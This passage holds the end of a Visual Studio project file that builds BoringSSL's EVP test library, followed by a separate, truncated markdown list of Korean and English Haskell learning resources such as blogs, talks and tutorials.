Condition="'$(VisualStudioVersion)' == '11.0'" Label="Configuration"> <PlatformToolset>v110</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(VisualStudioVersion)' == '12.0'" Label="Configuration"> <PlatformToolset>v120</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(VisualStudioVersion)' == '14.0'" Label="Configuration"> <PlatformToolset>v140</PlatformToolset> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)'=='Debug'" Label="Configuration"> <ConfigurationType>StaticLibrary</ConfigurationType> <UseDebugLibraries>true</UseDebugLibraries> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)'=='Release'" Label="Configuration"> <ConfigurationType>StaticLibrary</ConfigurationType> <UseDebugLibraries>false</UseDebugLibraries> <WholeProgramOptimization>true</WholeProgramOptimization> <CharacterSet>Unicode</CharacterSet> </PropertyGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <ImportGroup Label="ExtensionSettings"> </ImportGroup> <ImportGroup Label="PropertySheets"> <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> <Import Project="$(SolutionDir)\..\vsprojects\global.props" /> <Import Project="$(SolutionDir)\..\vsprojects\winsock.props" /> </ImportGroup> <PropertyGroup Label="UserMacros" /> <PropertyGroup Condition="'$(Configuration)'=='Debug'"> <TargetName>boringssl_evp_test_lib</TargetName> </PropertyGroup> <PropertyGroup Condition="'$(Configuration)'=='Release'"> <TargetName>boringssl_evp_test_lib</TargetName> </PropertyGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <ClCompile> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <Optimization>Disabled</Optimization> <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> <TreatWarningAsError>false</TreatWarningAsError> <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat> <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild> </ClCompile> <Link> <SubSystem>Windows</SubSystem> <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation> <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ClCompile> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <Optimization>Disabled</Optimization> <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> <TreatWarningAsError>false</TreatWarningAsError> <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat> <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild> </ClCompile> <Link> <SubSystem>Windows</SubSystem> <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation> <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ClCompile> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <Optimization>MaxSpeed</Optimization> <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> <FunctionLevelLinking>true</FunctionLevelLinking> <IntrinsicFunctions>true</IntrinsicFunctions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> <TreatWarningAsError>false</TreatWarningAsError> <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat> <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild> </ClCompile> <Link> <SubSystem>Windows</SubSystem> <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation> <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation> <EnableCOMDATFolding>true</EnableCOMDATFolding> <OptimizeReferences>true</OptimizeReferences> </Link> </ItemDefinitionGroup> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ClCompile> <PrecompiledHeader>NotUsing</PrecompiledHeader> <WarningLevel>Level3</WarningLevel> <Optimization>MaxSpeed</Optimization> <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions> <FunctionLevelLinking>true</FunctionLevelLinking> <IntrinsicFunctions>true</IntrinsicFunctions> <SDLCheck>true</SDLCheck> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> <TreatWarningAsError>false</TreatWarningAsError> <DebugInformationFormat Condition="$(Jenkins)">None</DebugInformationFormat> <MinimalRebuild Condition="$(Jenkins)">false</MinimalRebuild> </ClCompile> <Link> <SubSystem>Windows</SubSystem> <GenerateDebugInformation Condition="!$(Jenkins)">true</GenerateDebugInformation> <GenerateDebugInformation Condition="$(Jenkins)">false</GenerateDebugInformation> <EnableCOMDATFolding>true</EnableCOMDATFolding> <OptimizeReferences>true</OptimizeReferences> </Link> </ItemDefinitionGroup> <ItemGroup> <ClCompile Include="$(SolutionDir)\..\third_party\boringssl\crypto\evp\evp_test.cc"> </ClCompile> </ItemGroup> <ItemGroup> <ProjectReference Include="$(SolutionDir)\..\vsprojects\vcxproj\.\boringssl_test_util\boringssl_test_util.vcxproj"> <Project>{427037B1-B51B-D6F1-5025-AD12B200266A}</Project> </ProjectReference> <ProjectReference Include="$(SolutionDir)\..\vsprojects\vcxproj\.\boringssl\boringssl.vcxproj"> <Project>{9FD9A3EF-C4A3-8390-D8F4-6F86C22A58CE}</Project> </ProjectReference> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> </ImportGroup> <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild"> <PropertyGroup> <ErrorText>This project references NuGet package(s) that are missing on this computer. Enable NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText> </PropertyGroup> </Target> </Project>
{ "pile_set_name": "Github" }
Haskell ======= * [**Introducing the Haskell Phrasebook**](https://typeclasses.com/news/2019-07-phrasebook) Go By Example처럼 예제로 소개 * [Monday Morning Haskell](https://mmhaskell.com/) * [school of haskell](https://www.schoolofhaskell.com/) * [fpcomplete.com](https://www.fpcomplete.com) * [tech.fpcomplete.com/haskell](https://tech.fpcomplete.com/haskell) * [fpcomplete.com/blog/topic/haskell](https://www.fpcomplete.com/blog/topic/haskell) * [Haskell Web Server in a 5MB Docker Image](https://www.fpcomplete.com/blog/2015/05/haskell-web-server-in-5mb) * [School of Haskell 2.0](https://www.fpcomplete.com/blog/2015/05/school-of-haskell-2) * [Secure package distribution: ready to roll](https://www.fpcomplete.com/blog/2015/05/secure-package-distribution) * [**Haskell and Rust**](https://www.fpcomplete.com/blog/2018/11/haskell-and-rust) * [Try Haskell](http://tryhaskell.org/) * [한국 하스켈 모임](https://haskell.kr/) * [서광열의 하스켈 블로그](http://kseo.github.io) * [haskellers.com](https://www.haskellers.com/) * [Haskell Koans for the Vancouver's Haskell UnMeetup](https://github.com/HaskVan/HaskellKoans) * [발렌타인 세미나 안내 - 순수 함수형 언어 하스켈에 대하여](https://www.youtube.com/watch?v=bTqIaEG3GHw) * [2015 나는 프로그래머다 컨퍼런스 (8,9) 박중운 - React.js & 최철웅 - Haskell 라이브코딩](https://www.youtube.com/watch?v=LP5CmzifV8I) * [케빈 TV 23회 - 언어 이야기 - 하스켈 (Haskell) 맛보기](https://www.youtube.com/watch?v=PcZez-GBiN0) * [cs-syd.eu/tags/haskell](https://cs-syd.eu/tags/haskell) * [PLEAC-Haskell](http://pleac.sourceforge.net/pleac_haskell/) * [pipes](http://hackage.haskell.org/package/pipes) * [Coq of the Haskell pipes library](https://github.com/jwiegley/coq-pipes) * [Teaching Haskell to a 10 year old: Day 1](https://superginbaby.wordpress.com/2015/04/08/teaching-haskell-to-a-10-year-old-day-1/) * [Why I love Haskell: An Example](http://thenewsh.blogspot.kr/2015/04/why-i-love-haskell-example.html) * [Functional Programming concepts, examples and patterns illustrated through Haskell syntax](https://github.com/caiorss/Functional-Programming) * [Blackjack: Following the Patterns](https://mmhaskell.com/blog/2020/4/27/blackjack-following-the-patterns) * [Becoming Productive in Haskell](http://mechanical-elephant.com/thoughts/2015-04-20-becoming-productive-in-haskell/) * [The Haskell School of Music -- From Signals to Symphonies](http://feedly.com/i/subscription/feed/https://news.ycombinator.com/rss) * [Haskell at Front Row](https://github.com/commercialhaskell/commercialhaskell/blob/master/usage/frontrow.md) * [The Mystical Properties of Programming, or Why I Chose Haskell](http://blog.jameslarisch.com/the-mystical-properties-of-programming-or-why-i-chose-haskell) * [**모나드 괴담**](https://e.xtendo.org/haskell/ko/monad_fear/slide#1) * [Introduction to Functional Programming](https://www.edx.org/course/introduction-functional-programming-delftx-fp101x-0) * [Functional Programming Course](https://github.com/bitemyapp/fp-course) Written by Tony Morris & Mark Hibberd for Data61 * [opentutorials.org/profile/22041](https://opentutorials.org/profile/22041) * [Haskell programmers are liars](http://www.garrisonjensen.com/2015/05/13/haskell-programs-are-lies.html) * [Learning Real Haskell Incrementally](http://begriffs.com/posts/2015-10-24-learning-haskell-incrementally.html) * [Gausian distributions form a monoid](https://izbicki.me/blog/gausian-distributions-are-monoids) * [Blazing fast Fibonacci numbers using Monoids](http://www.haskellforall.com/2020/04/blazing-fast-fibonacci-numbers-using.html) * [Monoidal Catamorphisms | Bartosz Milewski's Programming Cafe](https://bartoszmilewski.com/2020/06/15/monoidal-catamorphisms/) * [Haskell Communities and Activities Report](https://www.haskell.org/communities/05-2015/html/report.html) * [If Haskell were strict, what would the laziness be like?](http://nikita-volkov.github.io/if-haskell-were-strict/) * [haskell as a javascript MVC framework](http://tonyday567.github.io/blog/mvc-todo/) * [Making The Case For Haskell](http://blog.gem.co/post/119547746215/making-the-case-for-haskell) * [Thinking Functionally with Haskell](https://pragprog.com/magazines/2012-08/thinking-functionally-with-haskell) * [First-Class “Statements”](http://blog.jle.im/entry/first-class-statements) * [My First Two Weeks of Haskell at Wagon](http://www.wagonhq.com/blog/first-two-weeks-haskell-wagon) * [Haskell for OCaml programmers](http://science.raphael.poss.name/haskell-for-ocaml-programmers.html) * [Building a Quant Finance Monte Carlo Engine in Haskell - Part 1](http://boundedvariation.github.io/) * [Thinking with Laziness](http://begriffs.com/posts/2015-06-17-thinking-with-laziness.html) * [Moving Haskell processes between nodes (Transient effects IV)](https://www.fpcomplete.com/user/agocorona/moving-haskell-processes-between-nodes-transient-effects-iv) * [How Laziness Works](http://two-wrongs.com/how-laziness-works) * [Haskell programming tips](https://wiki.haskell.org/Haskell_programming_tips) * [Parallelism vs. Concurrency](https://wiki.haskell.org/Parallelism_vs._Concurrency) * [Tying the Knot](https://wiki.haskell.org/Tying_the_Knot) * [Fighting spam with Haskell](https://code.facebook.com/posts/745068642270222/fighting-spam-with-haskell/) * [Reviving the Gofer Standard Prelude](https://donsbot.wordpress.com/2009/01/31/reviving-the-gofer-standard-prelude-circa-1994/) * [Developing web applications with Haskell](https://docs.google.com/presentation/d/10m9zTl3Lir68VsT-yV_Ke-hvBBuq7Lj08WQ-yxElIKg/edit#slide=id.g35f391192_00) * [Perf for low-level profiling](https://www.fpcomplete.com/user/bitonic/perf-for-low-level-profiling) * [Translating Haskell to C++ metaprogramming](http://www.vandenoever.info/blog/2015/07/12/translating-haskell-to-c++.html) * [A gentle introduction to statistical relational learning: maths, code, and examples](http://phdp.github.io/posts/2015-07-13-srl-code.html) * [From Lenses to Yoneda Embedding](http://bartoszmilewski.com/2015/07/13/from-lenses-to-yoneda-embedding/) * [Haskell - Generating lenses for third party libraries](https://dev.to/piq9117/haskell-generating-lenses-for-third-party-libraries-1oik) * [Thoughts on Conduits](http://neilmitchell.blogspot.kr/2015/07/thoughts-on-conduits.html) * [Fast Nearest Neighbor Queries in Haskell](https://izbicki.me/blog/fast-nearest-neighbor-queries-in-haskell.html) * [Summer 2015 Haskell Class](https://github.com/michaelochurch/summer-2015-haskell-class) * [Haskell Source Navigation](http://begriffs.com/posts/2015-07-27-haskell-source-navigation.html) * [Automated reasoning in F#, Scala, Haskell, C++, and Julia](http://phdp.github.io/posts/2015-04-05-automated-reasoning.html) * [State of the Haskell ecosystem - August 2015](https://github.com/Gabriel439/post-rfc/blob/master/sotu.md) * [State of the Haskell ecosystem - August 2015](http://www.haskellforall.com/2015/08/state-of-haskell-ecosystem-august-2015.html) * [Building a probabilistic programming interpreter](http://zinkov.com/posts/2015-08-25-building-a-probabilisitic-interpreter/) * [Effectful Haskell: IO, Monads, Functors](http://slpopejoy.github.io/posts/Effectful01.html) * [Programming with distributed functional futures](http://www.macs.hw.ac.uk/~rs46/posts/2015-09-07-distributed-functional-futures.html) * [Practical Recursion Schemes](https://medium.com/@jaredtobin/practical-recursion-schemes-c10648ec1c29) * [Emulating higher order modules in Haskell](http://dnaq.github.io/2015/09/14/emulating-higher-order-modules-in-haskell/) * [2D Contouring](http://www.mattkeeter.com/projects/contours/) * [Natural Transformations](http://bartoszmilewski.com/2015/04/07/natural-transformations/) * [Three Space Leaks](http://neilmitchell.blogspot.kr/2015/09/three-space-leaks.html) * [Side Effects vs. Promises](http://www.blueskyonmars.com/2015/10/01/side-effects-vs-promises/) * [The Genuine Sieve of Eratosthenes](http://vicarie.in/posts/sieve-of-eratos.html) * [Thoughts on Haskell](http://khanlou.com/2015/10/thoughts-on-haskell/) * [Markov Chains à la Carte](https://medium.com/@jaredtobin/markov-chains-a-la-carte-3fc40df45592) * [Haskell Web Development: A Freely Available Book](https://www.indiegogo.com/projects/haskell-web-development-a-freely-available-book#/) * [Persistent data structures](http://www.toves.org/books/persist/) * [Implementing a minimal version of haskell-servant](http://www.well-typed.com/blog/2015/11/implementing-a-minimal-version-of-haskell-servant/) * [A lot of websockets in Haskell](https://blog.wearewizards.io/a-lot-of-websockets-in-haskell) * [Functors and monads for analyzing data](https://izbicki.me/blog/functors-and-monads-for-analyzing-data.html) * [Initial Algebra as Directed Colimit](https://bartoszmilewski.com/2020/04/09/initial-algebra-as-directed-colimit/) functor * [Functortown: A Map of the Territory](https://typeclasses.com/functortown) * [Haskell in ES6: Part 1](http://casualjavascript.com/javascript/es6/haskell/native/implementation/2015/11/12/haskell-in-es6-part-1.html) * [How I deploy Haskell Code](http://www.alfredodinapoli.com/posts/2015-11-03-how-i-deploy-haskell-code.html) * [Interactive contraint solving in Haskell](http://www.mattkeeter.com/projects/constraints/) * [A Tor Implementation in Haskell](https://github.com/GaloisInc/haskell-tor) * [Anatomy of a Haskell-based Application](http://abailly.github.io/posts/cm-arch-design.html) * [The design of the Strict Haskell pragma](http://blog.johantibell.com/2015/11/the-design-of-strict-haskell-pragma.html) * [Seemingly impossible functional programs](http://math.andrej.com/2007/09/28/seemingly-impossible-functional-programs/) * [Data-Pipelines in Haskell](https://sulami.github.io/data-pipelines-in-haskell.html) * [Raytracing black holes with Haskell](https://flannelhead.github.io/projects/blackstar.html) * [Efficient binary serialization](https://www.fpcomplete.com/blog/2016/03/efficient-binary-serialization) * [Write You a Haskell - Building a modern functional compiler from first principles](http://dev.stephendiehl.com/fun/index.html) * [C9 Lectures: Dr. Erik Meijer - Functional Programming Fundamentals, Chapter 1 of 13](https://channel9.msdn.com/Series/C9-Lectures-Erik-Meijer-Functional-Programming-Fundamentals/Lecture-Series-Erik-Meijer-Functional-Programming-Fundamentals-Chapter-1) * [IX. Pattern Matching with Fragmentation Sets](http://www.youtube.com/watch?v=T15WBAWDefc) * [Short pattern matching examples using fragmentation sets](https://github.com/KedalionDaimon/patternmatching) ``` How to run (I tried to make it very easy): Pick the Scheme interpreter of your choice, e.g. GNU Guile, and do: guile larcom-e2.scm guile larcom-f.scm For the Haskell thing, do (assuming you have GHC): ghci :load sf2.hs From here on, you can do experiments about similiarity, like: similarity [1,2,3,4] [6,2,3,1] -- giving 40, or: similarity [0,1,1] [1,1,1,1,0] -- giving 4, or: similarity [2,2,2,2,2] [2,2,2,3,2,1] -- giving 17, etc., until you leave with: :q A higher value means greater similarity. - Essentially, these functions are made to be used in your own AI programming experiments. In future videos, I am building on these ideas. ``` * [스칼라를 이용한 개발 이후](http://hamait.tistory.com/719) * [리스트 비교하기 — 하스켈](https://medium.com/@jooyunghan/%EB%A6%AC%EC%8A%A4%ED%8A%B8-%EB%B9%84%EA%B5%90%ED%95%98%EA%B8%B0-%ED%95%98%EC%8A%A4%EC%BC%88-83b0cbf4a8b1) * [Modern Software Development with Haskell by Runar Bjarnason](https://www.youtube.com/watch?v=IKm-YYPaohQ) * [하스켈 나라 탐험기 (1)](https://harfangk.github.io/2017/04/28/my-brief-foray-into-the-land-of-haskell-1-ko.html) * [하스켈 나라 탐험기 (2)](https://harfangk.github.io/2017/05/14/my-brief-foray-into-the-land-of-haskell-2-ko.html) * [Spacemacs에서 한국어 사용하기](https://harfangk.github.io/2018/07/21/using-korean-in-spacemacs-ko.html) * [Running a startup on Haskell](https://www.youtube.com/watch?v=ZR3Jirqk6W8) * [Haskell Tutorial](https://www.youtube.com/watch?v=02_H3LjqMr8) * [Haskell Basics - FunFunFunction #35](https://www.youtube.com/watch?v=j5a9l1Td2Lo) * [Haskell - Baby's first functions - FunFunFunction #36](https://www.youtube.com/watch?v=v5AukLriIh8) * [Haskell lists - FunFunFunction #39](https://www.youtube.com/watch?v=FufhKV3dEis) * [Simon Peyton Jones - Haskell is useless](https://www.youtube.com/watch?v=iSmkqocn0oQ) * [Haskell is Not For Production and Other Tales](https://www.youtube.com/watch?v=mlTO510zO78) * [Fun never stops. Introduction to Haskell Programming language by Paul Szulc](https://www.youtube.com/watch?v=1jZ7j21g028) * [Haskell Live - Episode 1: The Chess Board](https://www.youtube.com/watch?v=ScS8Q32lMxA) * [Haskell Live - Episode 2: Time To Refactor](https://www.youtube.com/watch?v=6KkF5-_erns) * [Redoing Make - Haskell from Scratch #1](https://www.youtube.com/watch?v=zZ_nI9E9g0I) * [learn you a haskell](https://www.youtube.com/playlist?list=PLPqPwGvHPSZB-urE6QFjKYt6AGXcZqJUh) * [Programming - Why Haskell is Great - 10 minutes](https://www.youtube.com/watch?v=RqvCNb7fKsg) * [Easy Native GUIs in Haskell, Today!](https://www.youtube.com/watch?v=5hoQLovZBxQ) * [Fun with GHCJSi](https://www.youtube.com/watch?v=x7dQVZiWjvA) * [Functional Programming & Haskell - Computerphile](https://www.youtube.com/watch?v=LnX3B9oaKzw) * [Haskell Sucks!](https://www.youtube.com/watch?v=rvRD_LRaiRs) * [Right and left folds, primitive recursion patterns in Python and Haskell](https://eli.thegreenplace.net/2017/right-and-left-folds-primitive-recursion-patterns-in-python-and-haskell/) * [개미 수열 Haskell 풀이](https://medium.com/@jooyunghan/%EA%B0%9C%EB%AF%B8-%EC%88%98%EC%97%B4-haskell-%ED%92%80%EC%9D%B4-9799a023012) * [Learning me a Haskell for my own good](https://medium.com/@mickduprez/learning-me-a-haskell-for-my-own-good-c59eddb7f45a) * [5 Years of Haskell in Production](https://www.youtube.com/watch?v=hZgW4mT1PkE) * [Haskell 초급 예제 — todo](https://medium.com/@jooyunghan/haskell-%EC%B4%88%EA%B8%89-%EC%98%88%EC%A0%9C-todo-7faf85d45dea) * [Haskell #1 (Introduction)](https://medium.com/@goinhacker/haskell-study-1-db0a9d9ac318) * ["Building Secure Systems in Haskell" by Deian Stefan](https://www.youtube.com/watch?v=jX-zsoPWah0) * [Fixpoints in Haskell](https://medium.com/@cdsmithus/fixpoints-in-haskell-294096a9fc10) * [What Haskell taught us when we were not looking - Eric Torreborre](https://www.youtube.com/watch?v=9liCkM3bDig) * [Domain Modelling with Haskell: Data Structures](https://haskell-at-work.com/episodes/2018-01-19-domain-modelling-with-haskell-data-structures.html) * [**agbird.egloos.com/category/하스켈 스프링노트**](http://agbird.egloos.com/category/%ED%95%98%EC%8A%A4%EC%BC%88%20%EC%8A%A4%ED%94%84%EB%A7%81%EB%85%B8%ED%8A%B8) * [core-lang-haskell](https://github.com/Ailrun/core-lang-haskell) * [LINE 하스켈 부트 캠프](https://engineering.linecorp.com/ko/blog/line-haskell-boot-camp/) * [An opinionated guide to Haskell in 2018](https://lexi-lambda.github.io/blog/2018/02/10/an-opinionated-guide-to-haskell-in-2018) * [reasonablypolymorphic.com/blog/archives](http://reasonablypolymorphic.com/blog/archives/) * [Functional Programming for the Long Haul](https://www.youtube.com/watch?v=4Q9WUrelSng) * [24 Days of GHC Extensions](https://ocharles.org.uk/pages/2014-12-01-24-days-of-ghc-extensions.html) * [A Guide to GHC's Extensions](https://limperg.de/ghc-extensions/) * [EXTENSIONS](https://kowainik.github.io/posts/extensions) * [Tackling the awkward squad: monadic input/output, concurrency, exceptions, and foreign-language calls in Haskell](https://www.microsoft.com/en-us/research/publication/tackling-awkward-squad-monadic-inputoutput-concurrency-exceptions-foreign-language-calls-haskell/?from=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2Fum%2Fpeople%2Fsimonpj%2Fpapers%2Fmarktoberdorf%2Fmark.pdf) * [Programming Nirvana, Plan B](http://wordaligned.org/articles/programming-nirvana-plan-b) * [Covariance and Contravariance](https://www.fpcomplete.com/blog/2016/11/covariance-contravariance) * [**공변성과 반공변성은 무엇인가?**](https://edykim.com/ko/post/what-is-coercion-and-anticommunism/) * [Coroutine.hs](https://github.com/damhiya/Coroutine/blob/master/Control/Monad/Coroutine.hs) * [Data.Proxy](https://kseo.github.io/posts/2017-01-15-data-proxy.html) * [Elm Town 47 - A Cool, Easy Way To Start Learning Haskell](https://elmtown.simplecast.fm/a-cool-easy-way-to-start-learning-haskell) * [Adding Interactivity with Elm!](https://mmhaskell.com/blog/2020/2/18/addin) * ["A history of Haskell: being lazy with class"를 읽고](https://www.sangkon.com/study-a-history-of-haskell-part1/) * [Worst practices should be hard](http://www.haskellforall.com/2016/04/worst-practices-should-be-hard.html) * [knapsack.hs](https://gist.github.com/harfangk/9ec016c3a8dc88d3e10cc7348b33be24) * [Why hasn't functional programming taken over object-oriented programming?](https://www.quora.com/Why-hasnt-functional-programming-taken-over-object-oriented-programming) * [How does Haskell avoid stack overflow when non tail recursion is required?](https://www.quora.com/How-does-Haskell-avoid-stack-overflow-when-non-tail-recursion-is-required) * [What are the advantages and disadvantages of using Haskell to implement a domain specific language?](https://www.quora.com/What-are-the-advantages-and-disadvantages-of-using-Haskell-to-implement-a-domain-specific-language) * [Can the Haskell compiler automatically convert a recursive function that is not tail-recursive into a tail-recursive function using the continuation-passing style technique or some other technique?](https://www.quora.com/Can-the-Haskell-compiler-automatically-convert-a-recursive-function-that-is-not-tail-recursive-into-a-tail-recursive-function-using-the-continuation-passing-style-technique-or-some-other-technique) * [Defunctionalize the Continuation](https://www.cis.upenn.edu/~plclub/blog/2020-05-15-Defunctionalize-the-Continuation/) * [boxbase.org: Continuations for normalising sum types](https://boxbase.org/entries/2020/may/25/cps-nbe/) * [What does the flip function do in Haskell?](https://www.quora.com/What-does-the-flip-function-do-in-Haskell) * [How fast is Haskell?](https://www.quora.com/How-fast-is-Haskell) * [What are the most famous software written in Haskell and why aren't there more? I know of xmonad and that Standard Chartered used it in production. Are there others?](https://www.quora.com/What-are-the-most-famous-software-written-in-Haskell-and-why-arent-there-more-I-know-of-xmonad-and-that-Standard-Chartered-used-it-in-production-Are-there-others) * [zip.hs](https://gist.github.com/nattybear/be2ec4a55b94a2504ca813727ffb5a5b) * [zip.py](https://gist.github.com/nattybear/df6d7dfdacb588c271857a6219f9c914) * [Functional Programming And Formal Software Verification For Non Industry Applications - Or - Why you should learn Haskell and Coq](https://medium.com/@fabian.schneider/functional-programming-and-formal-software-verification-for-non-industry-applications-fefa24371856) * [github.com/leechanwoo/APSS/tree/master/haskell](https://github.com/leechanwoo/APSS/tree/master/haskell) * [Typing the technical interview](https://aphyr.com/posts/342-typing-the-technical-interview) * [Flunking the Coding Interview: Choose the wrong algorithm and still pass your coding interview](https://maxfieldchen.com/posts/2020-05-09-Code-Interview-Haskell-1.html) * [Advent of Haskell - Thoughts and lessons learned after using Haskell consistently for 25 days in a row](https://medium.com/@mvaldesdeleon/advent-of-haskell-950d6408a729) * [Do-notation considered harmful](https://syntaxfree.wordpress.com/2006/12/12/do-notation-considered-harmful/) * [ContinuationMore.ipynb](https://github.com/hnu-pl/grad-pl2019fall/blob/master/hsnote/ContinuationMore.ipynb) * [Memoization in Haskell](https://kseo.github.io/posts/2017-01-14-memoization-in-hasekll.html) * [Lazy Dynamic Programming](http://jelv.is/blog/Lazy-Dynamic-Programming/) * [The Evolution of a Haskell Programmer](https://willamette.edu/~fruehr/haskell/evolution.html) 유머라는데 하스켈 프로그래머들만 알아듣는 듯 * [Sonic 2 in Haskell: Playing with sprites](https://www.youtube.com/watch?v=lm-8sbFFV24) * [MatchString.hs](https://gist.github.com/ghjang/d8b5542730d64fbbc8268279431b3780) * [Regex?](https://rextester.com/PTSLI74648) * [Fighting spam with Haskell](https://engineering.fb.com/security/fighting-spam-with-haskell/) * [Micro C, Part 0](https://blog.josephmorag.com/posts/mcc0/) * [Micro C, Part 1](https://blog.josephmorag.com/posts/mcc1/) * [Micro C, Part 2: Semantic Analysis](https://blog.josephmorag.com/posts/mcc2/) * [Micro C, Part 3: Generating LLVM](https://blog.josephmorag.com/posts/mcc3/) * [Micro C, Part 4: Integrating the LLVM FFI](https://blog.josephmorag.com/posts/mcc4/) * [Polymorphic Perplexion](https://ucsd-progsys.github.io/liquidhaskell-blog/2020/04/12/polymorphic-perplexion.lhs/) * [Streaming the Redis replication stream](https://wjwh.eu/posts/2020-04-12-redis-conduit.html) * [Towards Faster Iteration in Industrial Haskell](https://blog.sumtypeofway.com/posts/fast-iteration-with-haskell.html) * [Performance comparison of parallel ray tracing in functional programming languages](https://github.com/athas/raytracers) * [Continuous Integration in Haskell](https://medium.com/@_KtorZ_/continuous-integration-in-haskell-9ad2a73e8e46) * [Is Haskell a Bad Choice?](https://blog.bojo.wtf/management/2020/04/15/is-haskell-a-bad-choice.html) * [PERMISSIVE, THEN RESTRICTIVE: LEARNING HOW TO DESIGN HASKELL PROGRAMS](https://williamyaoh.com/posts/2020-04-19-permissive-vs-restrictive.html) * [Syntactic ambiguity resolution in the GHC parser](https://blog.shaynefletcher.org/2020/04/syntactic-ambiguity-resolution-in-ghc.html) * [Consider Haskell](https://gilmi.me/blog/post/2020/04/28/consider-haskell) * [DERIVING ISOMORPHICALLY](https://www.tweag.io/posts/2020-04-23-deriving-isomorphically.html) * [Learn to moonwalk with waterflow problem](https://iokasimov.github.io/posts/2020/04/waterflow) * [Speeding up the Sixty compiler](https://ollef.github.io/blog/posts/speeding-up-sixty.html) * [Haskell on AWS Lambda - A Detailed Tutorial](https://www.haskelltutorials.com/haskell-aws-lambda/) * [Environment variables parsing for free (applicatives)](https://tech.fretlink.com/environment-variables-parsing-for-free-applicatives/) * [Intervals and their relations](https://marcosh.github.io/post/2020/05/04/intervals-and-their-relations.html) * [jmtd → log → template haskell](https://jmtd.net/log/template_haskell/) * [How many function arguments?](https://jmtd.net/log/how_many_arguments/) * [using Template Haskell to generate boilerplate](https://jmtd.net/log/template_haskell/boilerplate/) * [Template Haskell and Stream-processing programs](https://jmtd.net/log/template_haskell/streamgraph/) * [Frozen Lake in Haskell](https://mmhaskell.com/blog/2020/4/20/frozen-lake-in-haskell) * [More Random Access Lists](https://doisinkidney.com/posts/2020-05-02-more-random-access-lists.html) * [A TASTE OF BAZEL: BUILD A LIBRARY, A SERVICE AND HSPEC TESTS](https://www.tweag.io/posts/2020-05-06-convert-haskell-project-to-bazel.html) * [REANIMATE: SWEARING AT BAD DOCUMENTATION](https://williamyaoh.com/posts/2020-05-10-reanimate-an-experience-report.html) * [The State of Haskell IDEs](https://mpickering.github.io/ide/posts/2020-05-08-state-of-haskell-ide.html) * [Hereditary substitutions](https://boxbase.org/entries/2020/may/11/hereditary_substitutions/) * [Book "Functional Design and Architecture"](https://np.reddit.com/r/haskell/comments/gmxfqz/book_functional_design_and_architecture/) * [GHC Unproposals](https://neilmitchell.blogspot.com/2020/05/ghc-unproposals.html) * [Implementing Clean Architecture with Haskell and Polysemy](https://github.com/thma/PolysemyCleanArchitecture/) * [Competitive programming in Haskell: summer series](https://byorgey.wordpress.com/2020/05/16/competitive-programming-in-haskell-summer-series/) * [DerivingVia sums-of-products](https://iceland_jack.brick.do/e28e745c-40b8-4b0b-8148-1f1ae0c32d43) * [Frozen Lake with Q-Learning!](https://mmhaskell.com/blog/2020/5/4/frozen-lake-with-q-learning) * [Functional Fika — Nix and Haskell:](https://maxfieldchen.com/posts/2020-05-16-Functional-Fika-Haskell-Nix-Cabal.html) * [Monoidal Puzzle Solving](https://jonascarpay.com/posts/2020-05-26-solver.html) * [Well-Typed - The Haskell Consultants: Profiling Template Haskell splices](https://www.well-typed.com/blog/2020/05/profiling-template-haskell/) * [Well-Typed - The Haskell Consultants: Using Template Haskell to generate static data](https://www.well-typed.com/blog/2020/06/th-for-static-data/) * [Running HLint as a GHC source plugin - DEV](https://dev.to/tfausak/running-hlint-as-a-ghc-source-plugin-17dl) * [Simple Haskell is Best Haskell](https://medium.com/@fommil/simple-haskell-is-best-haskell-6a1ea59c73b) * [Building a Haskell 